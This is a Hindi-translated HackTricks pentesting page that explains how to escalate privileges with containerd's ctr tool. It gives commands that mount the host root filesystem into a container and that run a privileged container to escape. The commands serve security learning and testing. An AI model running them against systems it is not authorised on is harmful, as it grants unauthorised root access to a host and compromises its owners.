hacktricks/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

6.9 KiB

कंटेनरड (ctr) प्रिविलेज एस्कलेशन

☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

मूलभूत जानकारी

कंटेनरड और ctr क्या है इसे जानने के लिए निम्न लिंक पर जाएं:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}

PE 1

यदि आपको लगता है कि किसी होस्ट में ctr कमांड है:

which ctr
/usr/bin/ctr

आप छवियों की सूची बना सकते हैं:

ctr image list
REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -

और फिर उन छवियों में से एक को चलाएं जिसमें मेजबान रूट फ़ोल्डर को माउंट करें:

ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash

PE 2

एक कंटेनर को विशेषाधिकार से चलाएं और उससे बाहर निकलें। आप निम्नलिखित रूप में एक विशेषाधिकार से कंटेनर चला सकते हैं:

ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash

तो आप विशेषाधिकारिता का दुरुपयोग करके इससे बाहर निकलने के लिए निम्नलिखित पृष्ठ में उल्लिखित कुछ तकनीकों का उपयोग कर सकते हैं:

{% content-ref url="docker-security/" %} docker-security {% endcontent-ref %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
  • क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? सदस्यता योजनाएं की जांच करें!
  • The PEASS Family की खोज करें, हमारा एकल NFT संग्रह खोजें
  • आधिकारिक PEASS & HackTricks swag प्राप्त करें
  • 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या मुझे Twitter 🐦@carlospolopm** का पालन करें**.
  • अपनी हैकिंग ट्रिक्स को hacktricks repo और hacktricks-cloud repo में पीआर जमा करके अपना योगदान दें।